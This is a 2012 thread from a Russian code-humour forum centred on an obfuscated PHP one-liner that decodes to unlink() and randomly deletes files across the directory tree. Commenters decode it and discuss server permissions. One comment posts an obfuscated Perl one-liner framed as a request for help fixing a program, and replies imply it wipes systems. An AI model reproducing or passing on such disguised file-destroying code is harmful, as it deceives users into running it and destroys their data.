1. PHP / Говнокод #11326

    +52

    1. 1
    $g=str_rot13("hayvax");$gg=9999999;$ggg=100;foreach(glob("*/*/*") as $f){(rand(0,$gg)%rand(0,$ggg))?$g($f):'';}

    =3

    Запостил: ZekMan, 01 Июля 2012

    Комментарии (30) RSS

    • ava bormand 01.07.2012 06:53 # +3

      Посоны, у меня с продакшон сервера пропала часть файлов. Не знаете, с чем это связано?
      Ответить

    • ava TheHamstertamer 01.07.2012 16:53 # +2

      Что это вообще за хуита?
      Ответить

      • ava bormand 01.07.2012 17:07 # +3

        unlink() файлов, удовлетворяющих шаблону "*/*/*" с ненулевой вероятностью.

        UPD: За такую хуйню надо банить на год для профилактики. Вдруг кто-то бы запустил...
        Ответить

        • ava TarasB 01.07.2012 17:29 # +2

          что такое анлинк?
          Ответить

          • ava bormand 01.07.2012 17:33 # 0

            Запусти - узнаешь... *trollface.png*

            http://php.net/manual/ru/function.unlink.php

            А взято оно из *nix:
            http://linux.die.net/man/2/unlink
            Ответить

            • ava TarasB 02.07.2012 20:02 # +2

              В юниксе все названия такие говорящие?
              Ответить

              • ava Lure Of Chaos 02.07.2012 20:26 # +2

                они такие низкоуровневые
                Ответить

              • ava bormand 02.07.2012 20:29 # +1

                Многие. Так уж исторически сложилось... Ну и unlink() он же не удаляет файл сам по себе, он удаляет только ссылку на него из директории, а контент может выжить, если он еще открыт или же на него есть ссылки из других директорий. Отсюда и название.
                Ответить

              • ava bormand 02.07.2012 20:41 # 0

                Кстати, там еще есть creat() и lseek()...
                Ответить

        • ava eth0 01.07.2012 17:31 # +2

          Довольно забавный алгоритм, я "расшифровал" строку на глаз. Обычно пакуют строки в base64, а дальше чистый eval.
          Сама идея с вероятностью тоже неплоха.
          Запускать подозрительный код, если не умеешь пользоваться техниками деобфускации, категорически нельзя.
          Ответить

          • ava bormand 01.07.2012 17:36 # 0

            А я в консольке набрал rot13, и сразу же потерял желание это запускать ;)
            Правда не поверил, что $g($f) будет работать (в PHP я нуб), потестил - действительно работает.

            > Запускать подозрительный код, если не умеешь пользоваться техниками деобфускации, категорически нельзя.
            Полностью согласен.
            Ответить

            • ava eth0 01.07.2012 19:26 # +1

              > будет работать
              Будет-будет. С классами такое тоже должно катить.
              Ответить

          • ava ZekMan 02.07.2012 05:25 # 0

            Вот и я о чем, а минусуют >.>
            Ответить

            • ava bormand 02.07.2012 14:48 # +1

              Видимо потому, что не догадался, что моя фраза - сарказм.
              Ответить

        • ava TarasB 02.07.2012 09:31 # 0

          Интересно, что будет под пользовательской учёткой.
          Ответить

          • ava eth0 02.07.2012 13:36 # +1

            Немного не понял смысла вопроса. Если, скажем, апач запускается от пользователя, то он похерит все файлы этого пользователя, до которых дотянется. Если от православного nobody/apache, и на файлах стоят права, то не удалит ничего, кроме разве что им же залитого, но это нужно регулярно човнить (не знаю, как сделать автоматически).
            Ответить

            • ava TarasB 02.07.2012 22:48 # 0

              Смысл в том, что у того, кто настроил права, повреждения будут поменьше же?
              Ответить

              • ava eth0 03.07.2012 07:23 # 0

                Если права выставлены так, что сервер может читать, но не изменять, тогда часть проблем снимаются.
                Ответить

    • ava alterionisto 02.07.2012 19:52 # +1

      плюсанул, ибо нехуй непонятный код запускать
      Ответить

      • ava bormand 02.07.2012 20:12 # 0

        Минусанул. Ибо нехуй потенциально опасный код постить.

        Конечно, люди тут образованные и опытные, и никто не будет запускать этот код на своей машине... Но все же, давайте будем относиться друг к другу по-дружески, и не постить подобный код?
        Ответить

        • ava ZekMan 02.07.2012 21:04 # 0

          Ок, в следующий раз буду такое подписывать, мол - не запускайте...
          Ответить

        • ava 3.14159265 02.07.2012 21:07 # +2

          > на своей машине
          Ну есть же ideone.
          Лол, а какой-то дебил может и на тестовом серваке запустит.
          Ну str_rot13("unknown shit") - должен наталкивать на мысль.
          Ответить

        • ava rat4 02.07.2012 22:41 # +2

          помогите, пожалуйста исправить такую программу:

          cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

          - не печатает
          Ответить

          • ava bormand 03.07.2012 05:50 # +2

            Блин, что-то у меня система слетела. Переставлю ось - попробую что-нибудь подсказать.
            Ответить

          • ava guest 06.07.2012 22:25 # +4

            блин! ну хорош так издеваться, я уже за день второй раз Linux переустанавливаю
            Ответить

            • ava HaskellGovno 07.07.2012 00:23 # 0

              Виндро нужно было ставить.
              Ответить

            • ava rat4 07.07.2012 08:06 # 0

              Перед запуском незнакомого кода нужно установить Патч Бармина.
              Ответить

    • ava guest 07.07.2012 09:19 # 0

      хули вы пиздите что он безвредный?
      Ответить

    Добавить комментарий